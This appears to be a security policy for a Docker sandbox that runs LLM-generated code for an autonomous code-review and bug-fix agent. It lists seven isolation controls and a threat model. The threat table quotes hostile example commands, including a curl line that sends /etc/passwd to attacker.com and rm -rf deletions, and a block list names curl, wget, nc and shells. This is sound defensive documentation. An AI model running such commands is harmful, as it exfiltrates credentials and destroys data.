Spaces:
Running
Running
File size: 3,621 Bytes
dc71cad | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 | # Sandbox Security Policy
## Purpose
This document describes the security controls applied to the Docker-based code execution
sandbox used by the Autonomous Code Review & Bug-Fix Agent.
## Threat Model
The sandbox runs **untrusted LLM-generated code** and **arbitrary pytest test suites**
from public GitHub repositories. The risk categories are:
| Threat | Example | Control |
|--------|---------|---------|
| Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` |
| Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60s timeout |
| Host filesystem access | `open('/etc/passwd')` | `--read-only`, volume-limited |
| Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) |
| Malicious commands | `rm -rf /workspace` | Command whitelist |
| Persistent state | Writing outside /workspace | `--read-only` + limited tmpfs |
## Security Controls (7 Layers)
### 1. Network Isolation β `--network=none`
The container has **zero network access**. No DNS, no HTTP, no TCP sockets.
This is the most important control β it prevents data exfiltration and
supply-chain attacks from untrusted test dependencies.
### 2. Memory cgroup β `--memory=2g`
Container is killed by the kernel OOM killer if memory exceeds 2 GB.
Prevents fork bombs and memory exhaustion from affecting the host.
### 3. CPU cgroup β `--cpus=2.0`
Limits container to 2 CPU cores. Prevents CPU saturation that would
degrade other running containers / the host system.
### 4. Read-Only Filesystem β `--read-only --tmpfs=/tmp:size=256m`
The container's filesystem is mounted read-only. Only two writable locations:
- `/workspace` β the cloned repo (bind-mounted, scoped to this run)
- `/tmp` β tmpfs, 256 MB, wiped at container exit
### 5. Command Whitelist β `ALLOWED_COMMANDS`
Before any command reaches Docker, the executor checks the base command name
against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo,
find, grep, head, tail, mkdir, cp, mv, touch, chmod}`.
Commands like `rm`, `curl`, `wget`, `bash`, `sh`, `nc` are blocked at this layer.
### 6. Non-Root User β `uid=1000`
All processes run as `agent:agent (1000:1000)`. If an exploit escapes the
command whitelist, it cannot modify system files or escalate privileges.
### 7. Timeout β 60 seconds SIGKILL
The executor sets a 60-second hard timeout. The container is killed via
`docker stop --time=0` (SIGKILL) to prevent hung processes from consuming
resources indefinitely.
## Isolation Per Run
Each SWE-bench instance gets a **fresh temporary directory** as its workspace.
The container is created with `--rm` so it is automatically deleted after each run.
No state persists between runs.
## Audit Log
Every command executed in the sandbox is logged with:
- instance_id
- command (truncated to first 3 tokens for brevity)
- returncode
- elapsed_seconds
- timed_out flag
Logs are written to `structlog` (JSON format in production) and ingested by
the Prometheus/Grafana observability stack in Phase 8.
## Known Limitations
- **Conda environments**: Some SWE-bench repos require specific conda environments
with C extensions. The current sandbox uses pip-only install. This may cause
test failures for repos with complex native dependencies.
- **Docker-in-Docker**: The sandbox does not support running Docker inside Docker.
Repos that spawn subprocesses to call Docker will fail at the network level.
- **Flaky tests**: ~8% of SWE-bench issues have non-deterministic tests. These may
burn retries even when the patch is correct. Flagged as `flaky_test` category.
|